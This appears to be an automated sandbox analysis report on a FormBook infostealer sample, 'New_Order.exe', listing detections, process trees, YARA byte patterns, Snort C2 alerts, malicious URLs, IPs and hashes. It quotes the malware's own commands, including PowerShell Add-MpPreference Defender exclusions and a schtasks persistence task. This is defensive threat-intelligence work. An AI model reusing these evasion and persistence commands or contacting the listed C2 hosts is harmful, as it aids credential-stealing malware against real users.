Windows Analysis Report
New_Order.exe

Overview

General Information

Sample Name:New_Order.exe
Analysis ID:1352630
MD5:e63f894ae694122fe230d5a91250bc1f
SHA1:7822c03997f535ed9db4b3eccf480924686cb995
SHA256:1317668c84b4e2fdd8e6341a252f45bb44cfeeea05b11a2e1918f3f4afadc935
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • New_Order.exe (PID: 7360 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • powershell.exe (PID: 7536 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7584 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7656 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New_Order.exe (PID: 7820 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • New_Order.exe (PID: 7828 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • New_Order.exe (PID: 7840 cmdline: C:\Users\user\Desktop\New_Order.exe MD5: E63F894AE694122FE230D5A91250BC1F)
      • MxIFbOJlQLdXkFqAx.exe (PID: 1856 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 8188 cmdline: C:\Windows\SysWOW64\wextract.exe MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
          • MxIFbOJlQLdXkFqAx.exe (PID: 2492 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7832 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • QjSljS.exe (PID: 7860 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • schtasks.exe (PID: 8108 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • QjSljS.exe (PID: 8152 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • QjSljS.exe (PID: 8160 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
    • QjSljS.exe (PID: 8168 cmdline: C:\Users\user\AppData\Roaming\QjSljS.exe MD5: E63F894AE694122FE230D5A91250BC1F)
      • MxIFbOJlQLdXkFqAx.exe (PID: 5844 cmdline: "C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\wextract.exe MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ac33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16e82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27840:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        10.2.New_Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          10.2.New_Order.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ac33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16e82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          10.2.New_Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            10.2.New_Order.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x29e33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\New_Order.exe, ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 7360, ParentProcessName: New_Order.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp, ProcessId: 7656, ProcessName: schtasks.exe
            Timestamp:12/03/23-16:26:16.668057
            Source IP:192.168.2.4
            Destination IP:185.151.30.138
            SID:2855465
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:27:43.947745
            Source IP:192.168.2.4
            Destination IP:172.67.184.73
            SID:2855465
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:27:21.256906
            Source IP:192.168.2.4
            Destination IP:37.97.254.27
            SID:2855465
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:26:38.894529
            Source IP:192.168.2.4
            Destination IP:109.68.33.25
            SID:2855465
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:25:44.407183
            Source IP:192.168.2.4
            Destination IP:91.195.240.94
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:28:29.296841
            Source IP:192.168.2.4
            Destination IP:202.172.28.202
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:27:06.930079
            Source IP:192.168.2.4
            Destination IP:52.68.224.126
            SID:2855465
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:12/03/23-16:26:52.795950
            Source IP:192.168.2.4
            Destination IP:66.29.155.54
            SID:2855465
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: New_Order.exeReversingLabs: Detection: 67%
            Source: New_Order.exeVirustotal: Detection: 68%Perma Link
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: http://www.fdissolutions.net/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg==Avira URL Cloud: Label: malware
            Source: http://www.poria.link/fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: malware
            Source: http://www.quote2bill.com/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.wrautomotive.online/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.busan3-200.com/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.poria.link/fdo5/Avira URL Cloud: Label: malware
            Source: http://www.pay4dance.xyz/fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: phishing
            Source: http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUAvira URL Cloud: Label: malware
            Source: http://www.pay4dance.xyz/fdo5/Avira URL Cloud: Label: phishing
            Source: http://www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pwAvira URL Cloud: Label: malware
            Source: http://www.quote2bill.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw==Avira URL Cloud: Label: malware
            Source: http://www.busan3-200.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ==Avira URL Cloud: Label: malware
            Source: http://www.fdissolutions.net/fdo5/Avira URL Cloud: Label: malware
            Source: wrautomotive.onlineVirustotal: Detection: 7%Perma Link
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeReversingLabs: Detection: 67%
            Source: New_Order.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeJoe Sandbox ML: detected
            Source: New_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: New_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdbSHA256 source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: wextract.pdbGCTL source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdb source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165599306.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816147347.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4165740008.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New_Order.exe, New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49739 -> 91.195.240.94:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49744 -> 185.151.30.138:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 109.68.33.25:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 66.29.155.54:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 52.68.224.126:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 37.97.254.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 172.67.184.73:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 202.172.28.202:80
            Source: DNS query: www.pay4dance.xyz
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:30 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 
72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlserver: Microsoft-IIS/10.0x-powered-by: ASP.NETdate: Sun, 03 Dec 2023 15:26:32 GMTcontent-length: 1245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 
